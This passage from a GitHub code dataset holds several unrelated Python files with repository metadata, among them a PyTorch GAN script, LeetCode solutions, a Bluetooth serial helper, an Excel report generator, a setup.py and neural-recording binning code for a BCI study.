update_movie.desc= request.POST['desc']\n update_movie.save()\n return redirect(\"Display\", id = update_movie.id)\n\ndef del_show(request, id):\n movie_to_del = Movie.objects.get(id=id)\n movie_to_del.delete()\n return redirect(\"/shows\")","repo_name":"zahramughais/Semi_Restful_TV_Shows","sub_path":"Tv_Shows_App/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35855142842","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 16 15:49:57 2023\r\n\r\n@author: Zack Amos\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport math\r\nimport torch\r\nfrom torch import nn\r\nimport matplotlib.pyplot as plt\r\n\r\ntrain_size = 1024\r\nhalfsize = int(train_size/2)\r\n\r\nsignal1 = torch.zeros((halfsize,2))\r\nsignal2 = torch.zeros((halfsize,2))\r\ntheta = torch.rand(train_size)*2.*math.pi\r\nr = 0.1\r\nsignal1[:,0] = r\r\nsignal1[:,1] = theta[:512]\r\n\r\nsignal2[:,0] = 2*r\r\nsignal2[:,1] = theta[:-512]\r\n\r\nlabels1 = torch.ones(halfsize,1)\r\nlabels2 = 2*torch.ones(halfsize,1)\r\n\r\nsignal = torch.cat((signal1, signal2))\r\nlabels = torch.cat((labels1, labels2))\r\nsignal = torch.cat((signal, labels),1)\r\n\r\ntrain_set = [torch.cat((signal[i], labels[i])) for i in range(train_size)]\r\n\r\n\r\n#plt.plot(signal[:,0],signal[:,1],\".\")\r\n#plt.show()\r\n\r\nbatch_size = 32\r\ntrain_loader = torch.utils.data.DataLoader(\r\n train_set, batch_size=batch_size, shuffle=True\r\n)\r\n\r\nclass Discriminator(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n self.model = nn.Sequential(\r\n nn.Linear(3, 256),\r\n nn.ReLU(),\r\n nn.Dropout(0.3),\r\n nn.Linear(256, 128),\r\n nn.ReLU(),\r\n nn.Dropout(0.3),\r\n nn.Linear(128, 64),\r\n nn.ReLU(),\r\n nn.Dropout(0.3),\r\n nn.Linear(64, 1),\r\n nn.Sigmoid(),\r\n )\r\n\r\n def forward(self, x):\r\n output = self.model(x)\r\n return output\r\n\r\ndiscriminator = 
Discriminator()\r\n\r\nclass Generator(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n self.model = nn.Sequential(\r\n nn.Linear(3, 16),\r\n nn.ReLU(),\r\n nn.Linear(16, 32),\r\n nn.ReLU(),\r\n nn.Linear(32, 2),\r\n )\r\n\r\n def forward(self, x):\r\n output = self.model(x)\r\n return output\r\n\r\ngenerator = Generator()\r\n\r\nlr = 0.0001\r\nnum_epochs = 101\r\nloss_function = nn.BCELoss()\r\n\r\nloss_list = np.empty((0,3))\r\n\r\noptimizer_discriminator = torch.optim.Adam(discriminator.parameters(), lr=lr)\r\noptimizer_generator = torch.optim.Adam(generator.parameters(), lr=lr)\r\n\r\ncounter = 0\r\n\r\n\r\n\r\n\r\nfor epoch in range(num_epochs):\r\n print(epoch)\r\n loader = enumerate(train_loader)\r\n loaderdict = dict(loader)\r\n for n, (real_samples, real_samples_labels) in enumerate(train_loader):\r\n print(n)\r\n # Data for training the discriminator\r\n radii = torch.cat((torch.ones(int(batch_size/2)),2*torch.ones(int(batch_size/2))))\r\n latent_space_samples = torch.randn((batch_size, 2))\r\n\t\t#generate samples with \r\n generated_samples = generator(torch.cat((latent_space_samples, [radii]),1))\r\n generated_samples_labels = torch.zeros((batch_size,1))\r\n all_samples = torch.cat((real_samples, generated_samples))\r\n all_samples_labels = torch.cat((real_samples_labels, generated_samples_labels))\r\n\r\n # Training the discriminator on real samples\r\n discriminator.zero_grad()\r\n output_discriminator = discriminator(all_samples)\r\n loss_discriminator = loss_function(output_discriminator, all_samples_labels)\r\n loss_discriminator.backward()\r\n optimizer_discriminator.step()\r\n\r\n # Data for and training of the generator\r\n radii = torch.cat((torch.ones(int(batch_size/2)),2*torch.ones(int(batch_size/2))))\r\n latent_space_samples = torch.randn((batch_size, 2))\r\n generated_samples = generator(torch.cat((latent_space_samples, [radii]),1))\r\n output_discriminator_generated = discriminator(generated_samples)\r\n loss_generator = 
loss_function(output_discriminator_generated, real_samples_labels)\r\n loss_generator.backward()\r\n optimizer_generator.step()\r\n \r\n \r\n loss_list = np.append(loss_list, [[counter, loss_generator.detach().numpy(), loss_discriminator.detach().numpy()]], axis=0)\r\n counter +=1\r\n # Show loss\r\n if epoch % 10 == 0 and n == batch_size - 1:\r\n print(f\"Epoch: {epoch} loss D: {loss_discriminator}\")\r\n print(f\"Epoch: {epoch} loss G: {loss_generator}\")\r\n \r\n plt.figure(figsize=(8,8))\r\n plt.subplot(2,2,1)\r\n plt.plot(loss_list[:,0], loss_list[:,1])\r\n plt.subplot(2,2,2)\r\n plt.plot(loss_list[:,0], loss_list[:,2])\r\n \r\n \r\n radii = torch.cat((torch.ones(int(batch_size/2)),2*torch.ones(int(batch_size/2))))\r\n latent_space_samples = torch.randn((batch_size, 2))\r\n generated_samples = generator(torch.cat((latent_space_samples, [radii]),1))\r\n generated_samples = generated_samples.detach()\r\n \r\n plt.subplot(2,2,3)\r\n plt.xlim(-0.25,0.25)\r\n plt.ylim(-0.25,0.25)\r\n sin = torch.sin(signal[:, 1])\r\n cos = torch.cos(signal[:, 1])\r\n x = torch.multiply(signal[:, 0],sin)\r\n y = torch.multiply(signal[:, 0],cos)\r\n plt.plot(x,y , \".\")\r\n \r\n \r\n plt.subplot(2,2,4)\r\n plt.xlim(-0.25,0.25)\r\n plt.ylim(-0.25,0.25)\r\n sin = torch.sin(generated_samples[:, 1])\r\n cos = torch.cos(generated_samples[:, 1])\r\n x = torch.multiply(generated_samples[:, 0],sin)\r\n y = torch.multiply(generated_samples[:, 0],cos)\r\n plt.plot(x,y , \".\")\r\n \r\n plt.savefig(f'images_polarcircle_{epoch}.png')\r\n plt.close('all')\r\n \r\n \r\n\r\n\r\n\r\n\r\n","repo_name":"Zackmuons/RICH_GAN","sub_path":"polarcircle.py","file_name":"polarcircle.py","file_ext":"py","file_size_in_byte":5495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72288671172","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = 
None\n\nclass Solution(object):\n def findHeight(self, root):\n if root == None: return 0\n return max(self.findHeight(root.left), self.findHeight(root.right)) + 1\n \n def findBottomLeftValue(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n if root.left == None and root.right == None: return root.val\n left_height = self.findHeight(root.left)\n right_height = self.findHeight(root.right)\n if left_height >= right_height:\n return self.findBottomLeftValue(root.left)\n else:\n return self.findBottomLeftValue(root.right)\n ","repo_name":"JerryHu1994/LeetCode-Practice","sub_path":"Solutions/513-Find-Bottom-Left-Tree-Value/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19485381966","text":"import serial\nimport struct\n\nclass Bluetooth():\n DEVICE_FILE = '/dev/serial0'\n BAUDRATE = 115200\n\n def __init__(self):\n try:\n self._conn = serial.Serial(self.DEVICE_FILE, self.BAUDRATE)\n self._dummy = False\n print('Bluetooth')\n except serial.SerialException:\n self._conn = None\n self._dummy = True\n print('Dummy Bluetooth')\n\n def send(self, string):\n \"\"\"Send |string| as a series of characters. 
|string| should be\n alphabets, numbers and symbols which can be typed from your keyboard.\"\"\"\n if self._dummy:\n print('bluetooth: {}'.format(string))\n return\n self._conn.write(string)\n\n # See http://ww1.microchip.com/downloads/en/DeviceDoc/bluetooth_cr_UG-v1.0r.pdf\n # for detail.\n UART_CODES = {\n 'KEY_DELETE': 4,\n 'KEY_RIGHT': 7,\n 'KEY_BACKSPACE': 8,\n 'KEY_ENTER': 10,\n 'KEY_LEFT': 11,\n 'KEY_DOWN': 12,\n 'KEY_UP': 14,\n }\n\n def command(self, cmd):\n if cmd not in self.UART_CODES:\n print('Unknown Command: {}'.format(cmd))\n return\n if self._dummy:\n print('bluetooth: command({})'.format(cmd))\n return\n self.send(struct.pack('b', self.UART_CODES[cmd]))\n","repo_name":"google/mozc-devices","sub_path":"mozc-nazoru/src/nazoru/bluetooth.py","file_name":"bluetooth.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":1830,"dataset":"github-code","pt":"44"} +{"seq_id":"36421134986","text":"class Solution:\n def orangesRotting(self, grid: List[List[int]]) -> int:\n ROWS, COLS, DIRS = len(grid), len(grid[0]), [[-1, 0], [1, 0], [0, -1], [0, 1]]\n q, fresh, time = deque(), 0, 0\n \n for r in range(ROWS):\n for c in range(COLS):\n if grid[r][c] == 2:\n q.append([0,r,c])\n elif grid[r][c] == 1:\n fresh += 1\n # BFS with time as 1st index and then row & column\n while q:\n time, cr, cc = q.popleft()\n for dr, dc in DIRS:\n r, c = cr + dr, cc + dc\n if (r < 0 or c < 0 or\n r == ROWS or c == COLS or\n grid[r][c] != 1):\n continue\n grid[r][c] = 2\n q.append([time + 1,r,c])\n fresh -= 1\n return time if not fresh else -1\n \n","repo_name":"HunterCLcode/leetcodeSolns","sub_path":"994-Rotting-Oranges.py","file_name":"994-Rotting-Oranges.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28906805683","text":"from openpyxl import Workbook, load_workbook\nfrom openpyxl.styles import Border, Side, PatternFill, 
Font, GradientFill, Alignment\n\nnewwb = Workbook()\nws = newwb.active\nnew_sheet = newwb.create_sheet(\"newSheet\")\n\nc_line=0; line_split = []; max_row=0; min_row=0; max=0; min=0;\n\nthin = Side(border_style=\"thin\", color=\"000000\")\ndouble = Side(border_style=\"double\", color=\"ff0000\")\nborder = Border(top=double, left=thin, right=thin, bottom=double)\nfill = PatternFill(\"solid\", fgColor=\"DDDDDD\")\nfill = GradientFill(stop=(\"000000\", \"FFFFFF\"))\nfont = Font(b=True, color=\"FF0000\")\nal = Alignment(horizontal=\"center\", vertical=\"center\")\n\nfile=open(\"sales-report.txt\", \"r\")\nws.cell(row=1, column=1).value = \"SALES REPORT\"\nws.cell(row=2, column=1).value = \"Name\"\nws.cell(row=2, column=2).value = \"State\"\nws.cell(row=2, column=3).value = \"Sales\"\n\nfor line in file:\n\tline_split.append(line.split(\"|\"))\n\tws.cell(row=c_line+3, column=1).value = line_split[c_line][0]\n\tws.cell(row=c_line+3, column=2).value = line_split[c_line][1]\n\tws.cell(row=c_line+3, column=3).value = float(line_split[c_line][2])\n\tws.cell(row=c_line+3, column=2).alignment = al\n\tws.cell(row=c_line+3, column=3).number_format = '#,##0.00'\n\tif c_line == 0:\n\t\tmax_row = c_line+3; min_row = c_line+3; \n\t\tmax = min = float(line_split[c_line][2]);\n\tif max < float(line_split[c_line][2]):\n\t\tmax = float(line_split[c_line][2]); max_row = c_line+3;\n\tif min > float(line_split[c_line][2]):\n\t\tmin = float(line_split[c_line][2]); min_row = c_line+3; \n\tc_line+=1\t\nfile.close()\n\ndef style_range(ws, cell_range, border=Border(), fill=None, font=None, alignment=None):\n \"\"\"\n Apply styles to a range of cells as if they were a single cell.\n\n :param ws: Excel worksheet instance\n :param range: An excel range to style (e.g. 
A1:F20)\n :param border: An openpyxl Border\n :param fill: An openpyxl PatternFill or GradientFill\n :param font: An openpyxl Font object\n \"\"\"\n\n top = Border(top=border.top)\n left = Border(left=border.left)\n right = Border(right=border.right)\n bottom = Border(bottom=border.bottom)\n\n first_cell = ws[cell_range.split(\":\")[0]]\n if alignment:\n ws.merge_cells(cell_range)\n first_cell.alignment = alignment\n\n rows = ws[cell_range]\n if font:\n first_cell.font = font\n\n for cell in rows[0]:\n cell.border = cell.border + top\n for cell in rows[-1]:\n cell.border = cell.border + bottom\n\n for row in rows:\n l = row[0]\n r = row[-1]\n l.border = l.border + left\n r.border = r.border + right\n if fill:\n for c in row:\n c.fill = fill\n\nws.row_dimensions[2].font = font\nws.column_dimensions[\"A\"].width = 20\nws.column_dimensions[\"B\"].width = 15\nws.column_dimensions[\"C\"].width = 15\nws.column_dimensions[\"A\"].alignment = al\n\nmaxFill = PatternFill(start_color='0000FF00', end_color='0000FF00', fill_type='solid')\nminFill = PatternFill(start_color='00FF0000', end_color='00FF0000', fill_type='solid')\nfor x in range(1,4):\n\tws.cell(row=2,column=x).font = font\n\tws.cell(row=2,column=x).alignment = al\n\tws.cell(row=max_row, column=x).fill = maxFill\n\tws.cell(row=min_row, column=x).fill = minFill\nstyle_range(ws, 'A1:C1', border=border, fill=fill, font=font, alignment=al)\nprint(\"\\n\\n\\n************************************************************\")\nprint(\"******** Importing records to Excel ..... 
***********\")\nprint(\"************************************************************\")\nnewwb.save(\"sales-report.xlsx\")\nprint(\"\\n\\n\\nSales-report.xlsx Successfull Created\")\n","repo_name":"Samsonteo/Python_Tutorial","sub_path":"create excel.py","file_name":"create excel.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26835510896","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as readme:\n long_description = readme.read()\n\nsetuptools.setup(\n name = \"staticwebgen\",\n version = \"0.0.3\",\n author = \"OrangeBacon\",\n author_email = \"computer.backup.15@gmail.com\",\n description = \"A custom static site generator\",\n long_description = long_description,\n long_description_content_type = \"text/markdown\",\n url = \"https://github.com/OrangeBacon/staticwebgen\",\n license = \"MIT\",\n\n packages = [\"staticwebgen\"],\n entry_points = {\n 'console_scripts': [\"staticwebgen = staticwebgen.command_line:main\"]\n },\n install_requires = [\n \"watchdog\"\n ],\n\n classifiers = [\n \"Development Status :: 2 - Pre-Alpha\",\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Topic :: Software Development :: Code Generators\",\n \"Topic :: Internet\"\n ]\n)","repo_name":"OrangeBacon/staticwebgen","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"31922925145","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.io as sio\nfrom . 
import file_key as fk\nimport pickle\nimport os\nimport analysis_config\nfrom online_analysis import util_fcns\n\nimport sys\npy_ver = sys.version\n\nif '3.6.15' in py_ver:\n pkl_kw = dict(encoding='latin1')\nelif '2.7.8' in py_ver or '2.7.18' in py_ver:\n pkl_kw = dict()\n\n\ndef get_jeev_trials(filename, binsize=.1):\n try:\n dat = sio.loadmat(filename)\n except:\n ix = [j for i, j in enumerate(fk.filelist) if filename in j]\n assert(len(ix)==1)\n dat = sio.loadmat(ix[0])\n\n strobed = dat['Strobed']\n\n rew_ix = np.nonzero(strobed[:, 1]==9)[0]\n go_ix = rew_ix - 3\n ix = np.nonzero(strobed[go_ix, 1] == 5)[0]\n ix2 = np.nonzero(strobed[go_ix-1, 1] == 15)[0]\n ix_f = np.intersect1d(ix, ix2)\n\n rew_ix = rew_ix[ix_f]\n go_ix = go_ix[ix_f]\n\n # Make sure all 'go indices' 5s. \n assert np.sum(np.squeeze(strobed[go_ix, 1] - 5)) == 0\n\n times = list(zip(strobed[go_ix, 0], strobed[rew_ix, 0]))\n\n # Get decoder: \n ix = [i for i, j in enumerate(fk.filelist) if filename in j]\n\n # Get units\n assert(len(ix) == 1)\n decname = fk.decoderlist[ix[0]]\n dec = sio.loadmat(decname)\n unitlist = dec['decoder'][0]['predSig'][0][0]\n dat_units = [dat[k[0]] for i, k in enumerate(unitlist)]\n\n # Binning: \n bin_spk = _bin(times, dat_units, binsize)\n units_per = np.array([bs.shape[0] for i, bs in enumerate(bin_spk)])\n\n # Get Target info\n start_ix = strobed[go_ix - 3, 1]\n start_ix[start_ix == 400] = 2;\n start_ix[start_ix == 15] = 2;\n\n if np.sum(np.squeeze(start_ix - 2)) == 0:\n task = 'co'\n else:\n task = 'obs'\n\n if task == 'co':\n targ = strobed[go_ix - 2, 1]\n targ_ix = np.digitize(targ, fk.cotrialList) - 1\n assert np.sum(fk.cotrialList[targ_ix] - targ) == 0\n\n elif task == 'obs':\n targ = [strobed[g-4:g-1, 1] for i, g in enumerate(go_ix)]\n targ_ix = []\n for i, tg in enumerate(targ):\n tmp = np.tile(tg[np.newaxis, :], [len(fk.obstrialList), 1])\n ix = np.nonzero(np.sum(np.abs(fk.obstrialList - tmp), 1) == 0)[0]\n assert(len(ix)==1)\n targ_ix.append(ix[0])\n 
targ_ix = np.array(targ_ix)\n\n # Targ_ix, trial_ix\n targ_IX = []\n trial_IX = []\n for b, nb in enumerate(units_per):\n targ_IX.extend([targ_ix[b]]*nb)\n trial_IX.extend([b]*nb)\n\n # Decoder velocity outputs from AD 39/40 \n decoder_all = _bin_ad(times, dat, binsize)\n targ_i_all = []\n return bin_spk, targ_i_all, np.array(targ_IX), np.array(trial_IX), decoder_all\n\ndef get_jeev_trials_from_task_data(filename, include_pos = False, include_vel = False, binsize=.1, \n use_ITI=False, pre_go=0., get_ixs = False):\n\n if 'jeev082413_VFB_PPF_B100_NS5_NU20_Z1_assist_ofc_cont_cont_assist_ofc_fixData' in filename:\n start_index_overall = 55003\n else:\n start_index_overall = 0\n\n unbinned = dict()\n\n filelist_task = []\n for i, j in enumerate(fk.task_filelist):\n for k, l in enumerate(j):\n filelist_task.extend(l)\n try:\n dat = sio.loadmat(filename)\n except:\n ix = [j for i, j in enumerate(filelist_task) if filename in j]\n assert(len(ix)==1)\n try:\n dat = sio.loadmat(fk.task_directory+ix[0])\n except:\n dat = sio.loadmat(fk.task_directory_mbp+ix[0])\n\n strobed = make_strobed(dat, start_index_overall)\n\n rew_ix = np.nonzero(strobed[:, 1]==9)[0]\n go_ix = rew_ix - 3\n ix = np.nonzero(strobed[go_ix, 1] == 5)[0]\n ix2 = np.nonzero(strobed[go_ix-1, 1] == 15)[0]\n ix_f = np.intersect1d(ix, ix2)\n\n rew_ix = rew_ix[ix_f]\n go_ix = go_ix[ix_f]\n\n if use_ITI:\n go_ix = rew_ix.copy()\n rew_ix = rew_ix.copy() + 3 \n\n # Make sure all 'go indices' 5s. 
\n if use_ITI:\n assert np.sum(np.squeeze(strobed[go_ix, 1] - 9)) == 0\n else:\n assert np.sum(np.squeeze(strobed[go_ix, 1] - 5)) == 0\n \n ixs_og = list(zip(strobed[go_ix, 0], strobed[rew_ix, 0]))\n ixs = []\n\n # Ensure only indices > start_index_overall: \n for ii, (ji, ki) in enumerate(ixs_og):\n if np.logical_and(ji > start_index_overall, ki > start_index_overall):\n ixs.append((ji, ki))\n\n # Binning: \n spk_counts = dat['spike_counts'] # changed from 'spike_counts_all' to 'spike_counts', 2-7-19\n spk_counts_dt = float(dat['Delta_PPF'])\n assert spk_counts_dt == 0.005\n \n bin_spk, bin_spk_ub, exclude = _bin_spike_counts(ixs, spk_counts, spk_counts_dt, binsize, pre_go)\n unbinned['spike_counts'] = bin_spk_ub # changed from 'spike_counts_all' to 'spike_counts'\n units_per = np.array([bs.shape[0] for i, bs in enumerate(bin_spk)])\n unbinned_units_per = np.array([ix[1]-ix[0] for ix in ixs])\n\n # Get Target info\n start_ix = strobed[go_ix - 3, 1]\n start_ix[start_ix == 400] = 2;\n start_ix[start_ix == 15] = 2;\n\n if np.sum(np.squeeze(start_ix - 2)) == 0:\n task = 'co'\n else:\n task = 'obs'\n\n if task == 'co':\n targ = strobed[go_ix - 2, 1]\n targ_ix = targ - 64\n assert np.sum(fk.cotrialList[targ_ix] - targ) == 0\n\n elif task == 'obs':\n targ = [strobed[g-4:g-1, 1] for i, g in enumerate(go_ix)]\n targ_ix = []\n for i, tg in enumerate(targ):\n tmp = np.tile(tg[np.newaxis, :], [len(fk.obstrialList), 1])\n ix = np.nonzero(np.sum(np.abs(fk.obstrialList - tmp), 1) == 0)[0]\n if len(ix)==1:\n targ_ix.append(ix[0])\n else:\n targ_ix.append(-1)\n targ_ix = np.array(targ_ix)\n\n # Targ_ix, trial_ix\n targ_IX = []\n trial_IX = []\n for b, nb in enumerate(units_per):\n targ_IX.extend([targ_ix[b]]*nb)\n trial_IX.extend([b]*nb)\n\n targ_IX_UB = []\n for b, nb in enumerate(unbinned_units_per):\n targ_IX_UB.extend([targ_ix[b]]*nb)\n\n unbinned['target_ix'] = np.hstack((targ_IX_UB))\n\n if task == 'co':\n unbinned['target_loc'] = fk.targ_ix_to_loc(np.hstack((targ_IX_UB)))\n 
targ_i_all = fk.targ_ix_to_loc(np.array(targ_IX))\n elif task == 'obs':\n unbinned['target_loc'] = fk.targ_ix_to_loc_obs(np.hstack((targ_IX_UB)))\n targ_i_all = fk.targ_ix_to_loc_obs(np.array(targ_IX))\n\n # Decoder velocity outputs from AD 39/40 \n #try:\n decoder_all, decoder_all_ub = _bin_neural_push(ixs, filename, binsize, start_index_overall, pre_go)\n unbinned['neural_push'] = decoder_all_ub\n # #except:\n # import pdb; pdb.set_trace()\n # decoder_all = 0\n # unbinned['neural_push'] = 0\n unbinned['ixs'] = ixs\n unbinned['start_index_overall'] = start_index_overall\n \n if include_pos:\n cursor_kin = dat['cursor_kin']\n #import pdb; pdb.set_trace()\n print('Xlims: %.2f, %.2f'%(dat['horiz_min'][0, 0], dat['horiz_max'][0, 0]))\n print('Ylims: %.2f, %.2f'%(dat['vert_min'][0, 0], dat['vert_max'][0, 0]))\n bin_ck, ck = _bin_cursor_kin(ixs, cursor_kin, binsize, pre_go)\n print(len(bin_ck), bin_ck[0].shape)\n unbinned['cursor_kin'] = ck\n return bin_spk, targ_i_all, np.array(targ_IX), np.array(trial_IX), decoder_all, bin_ck, unbinned, exclude\n else:\n return bin_spk, targ_i_all, np.array(targ_IX), np.array(trial_IX), decoder_all, unbinned, exclude\n\ndef _bin(times, dat_units, binsize):\n bin_spk = []\n for i, (t0, t1) in enumerate(times):\n binedges = np.arange(t0, t1+binsize, binsize)\n X = np.zeros((len(binedges), len(dat_units) ))\n for u, unit in enumerate(dat_units):\n rel_ix = np.nonzero(np.logical_and(unit[:, 0] >= t0, unit[:, 0] < binedges[-1]))[0]\n ts = unit[rel_ix, 0]\n ts_dig = np.digitize(ts, binedges)\n for t, tsi_dig in enumerate(ts_dig):\n X[tsi_dig, u] += 1\n bin_spk.append(X)\n return bin_spk\n\ndef _bin_spike_counts(ixs, spike_counts, spk_counts_dt, binsize, pre_go):\n ''' pre_go_in seconds here...'''\n n_per_bin = int(binsize/spk_counts_dt)\n if pre_go is not None:\n pre_go_bins = int(pre_go/spk_counts_dt)\n else:\n pre_go_bins = 0\n\n exclude = []\n\n n_units = spike_counts.shape[0]\n bin_spk = []\n bin_spk_ub = []\n for i, (ix0, ix1) in 
enumerate(ixs):\n if ix0 > pre_go_bins:\n binedges = np.arange(ix0-pre_go_bins, ix1+n_per_bin, n_per_bin)\n X = np.zeros((len(binedges)-1, spike_counts.shape[0]))\n Xub = spike_counts[:, ix0-pre_go_bins:ix1]\n for b, bn in enumerate(binedges[:-1]):\n X[b, :] = np.sum(spike_counts[:, bn:binedges[b+1]], 1)\n else:\n exclude.append(i)\n X = np.zeros((1, spike_counts.shape[0]))\n bin_spk.append(X)\n bin_spk_ub.append(Xub)\n return bin_spk, bin_spk_ub, exclude\n\ndef _bin_cursor_kin(ixs, cursor_kin, binsize, pre_go = 0.):\n n_per_bin = int(binsize/.005)\n print(('Bin Curson kin Size %d' %(n_per_bin)))\n pre_go_bins = int( pre_go / .005 ); \n\n bin_ck = []\n ck = []\n z = np.zeros_like(cursor_kin[0, :])\n pos_vel = np.vstack((cursor_kin[0, :], z, cursor_kin[1, :], cursor_kin[2, :], z, cursor_kin[3, :], z+1.)).T\n for i, (ix0, ix1) in enumerate(ixs):\n binedges = np.arange(ix0-pre_go_bins, ix1+n_per_bin, n_per_bin)\n X = np.zeros((len(binedges)-1, pos_vel.shape[1]))\n Xub = pos_vel[ix0 - pre_go_bins:ix1, :]\n for b, bn in enumerate(binedges[:-1]):\n X[b, :] = np.sum(pos_vel[bn:binedges[b+1], :], 0)\n bin_ck.append(X)\n ck.append(Xub)\n return bin_ck, ck\n\ndef _bin_neural_push(ixs, filename, binsize, start_index_overall, pre_go = 0.):\n # First load neural push\n #neuralpush_fn = os.path.expandvars('$FA_GROM_DATA/jeev_neural_push.pkl')\n \n neuralpush_fn = '/Volumes/TimeMachineBackups/jeev2013/jeev_neural_push_apr2017.pkl'\n try:\n neuralpush = pickle.load(open(neuralpush_fn, 'rb'), **pkl_kw)\n except:\n neuralpush = pickle.load(open('/Users/preeyakhanna/Dropbox/TimeMachineBackups/jeev2013/jeev_neural_push_apr2017.pkl', 'rb'), **pkl_kw)\n \n # Get correct tag\n\n for i, dayfn in enumerate(fk.task_filelist):\n for j, blkfn in enumerate(dayfn):\n for k, fn in enumerate(blkfn):\n if fn == filename:\n tix = [i, j, k]\n \n neuralpush_spec = neuralpush[fk.task_input_type[tix[0]][tix[1]][tix[2]]]\n\n #Convert m to cm:\n neuralpush_spec = 100*neuralpush_spec\n\n #assert binsize 
== 0.1\n dt_per_bin = 0.005\n n_per_bin = int(binsize/dt_per_bin)\n pre_go_bins = int(pre_go/dt_per_bin)\n\n bin_ck = []\n ck = []\n for i, (ix0, ix1) in enumerate(ixs):\n binedges = np.arange(ix0 - start_index_overall - pre_go_bins, \n ix1+n_per_bin - start_index_overall, n_per_bin)\n X = np.zeros((len(binedges)-1, neuralpush_spec.shape[0]))\n Xub = neuralpush_spec[:, ix0 - pre_go_bins:ix1]\n for b, bn in enumerate(binedges[:-1]):\n ''' Get mean within 100 ms bins'''\n X[b, :] = np.sum(neuralpush_spec[:, bn:binedges[b+1]], 1)\n bin_ck.append(X)\n ck.append(Xub)\n return bin_ck, ck\n\ndef _bin_ad(times, dat, binsize):\n z = np.zeros_like(dat['AD37'])\n pos_vel = np.hstack((dat['AD39'], z, dat['AD40'], dat['AD37'], z, dat['AD38'], z+1.)) # Pos and velocity\n bin_ad = []\n for i, (t0, t1) in enumerate(times):\n binedges = np.arange(t0, t1+binsize, binsize)\n X = np.zeros((len(binedges)-1, pos_vel.shape[1]))\n for i, b in enumerate(binedges[:-1]):\n X[i, :] = np.mean(pos_vel[int(b*1000):int(binedges[i+1]*1000), :], 0)\n bin_ad.append(X)\n return bin_ad\n\ndef get_targ_ix(strobed, go_ix, task):\n if task == 'co':\n targ = strobed[go_ix - 2, 1]\n targ_ix = targ - 64\n assert np.sum(fk.cotrialList[targ_ix] - targ) == 0\n\n elif task == 'obs':\n targ = [strobed[g-4:g-1, 1] for i, g in enumerate(go_ix)]\n targ_ix = []\n for i, tg in enumerate(targ):\n tmp = np.tile(tg[np.newaxis, :], [len(fk.obstrialList), 1])\n ix = np.nonzero(np.sum(np.abs(fk.obstrialList - tmp), 1) == 0)[0]\n if len(ix)==1:\n targ_ix.append(ix[0])\n else:\n targ_ix.append(-1)\n targ_ix = np.array(targ_ix)\n return targ_ix\n\ndef make_strobed(dat, start_index_overall):\n strobed = []\n events = dat['task_events']\n\n for i, e in enumerate(events):\n ### Added 10-3-19 -- only keep if > start_index_overall; \n if i >= start_index_overall:\n if np.any(np.array(e[0].shape) == 0):\n skip = 1\n else:\n for j, ee in enumerate(e[0]):\n strobed.append([i, ee[0]])\n return np.array(strobed)\n\ndef 
plot_jeev_trials(task = 'obs', targ_only = 3, day_ix = 0, binsize = 0.1):\n input_type = fk.task_filelist\n \n if task == 'co':\n te_num = input_type[day_ix][0][0]\n \n elif task == 'obs':\n te_num = input_type[day_ix][1][0]\n \n bin_spk, targ_i_all, targ_ix, trial_ix_all, decoder_all, cursor_state, unbinned, exclude = get_jeev_trials_from_task_data(te_num,\n include_pos=True, binsize=binsize)\n\n colors = ['maroon', 'orangered', 'goldenrod','olivedrab','teal', 'steelblue', 'midnightblue', 'darkmagenta', 'k', 'brown']\n\n targs = np.unique(targ_ix)\n targs = targs[targs >= 0] # skip -1\n\n if targ_only is not None:\n targs = targs[targs == targ_only]\n\n if task == 'co':\n f, ax = plt.subplots(ncols = len(targs), figsize=(20, 3))\n \n elif task == 'obs':\n f, ax = plt.subplots(ncols = len(targs), nrows = 2, figsize=(20, 6))\n ax[0, 0].set_ylabel('CW')\n ax[1, 0].set_ylabel('CCW')\n \n if len(targs) == 1:\n ax = [ax]\n\n for ti, i in enumerate(targs):\n\n\n ### Get trials with the right target number: \n ix = np.nonzero(targ_ix == i)[0]\n\n ### Now figure out which trial: \n trl_ix = np.unique(trial_ix_all[ix])\n\n ### Plot the target: \n if task == 'co':\n ax[ti].set_xlim([-1.5, 3.0])\n ax[ti].set_ylim([1, 4.5])\n\n ### Targ\n tmp = np.linspace(0, 2*np.pi, 1000)\n tmp_x = .013*np.cos(tmp) + targ_i_all[ix[0], 0]\n tmp_y = .013*np.sin(tmp) + targ_i_all[ix[0], 1]\n\n ### Center\n tmp2_x = .013*np.cos(tmp) + 0.0377292\n tmp2_y = .013*np.sin(tmp) + 0.1383867 \n\n\n if binsize == 0.1:\n ax[ti].plot(tmp_x*20, tmp_y*20, 'k-')\n ax[ti].plot(tmp2_x*20, tmp2_y*20, 'k-')\n centerPos = np.array([0.0377292, 0.1383867])*20\n targetPos = targ_i_all[ix[0], [0, 1]]*20\n \n elif binsize == 0.005:\n ax[ti].plot(tmp_x*1, tmp_y*1, 'k-')\n ax[ti].plot(tmp2_x*1, tmp2_y*1, 'k-') \n centerPos = np.array([0.0377292, 0.1383867])*1 \n targetPos = targ_i_all[ix[0], [0, 1]]*1 \n 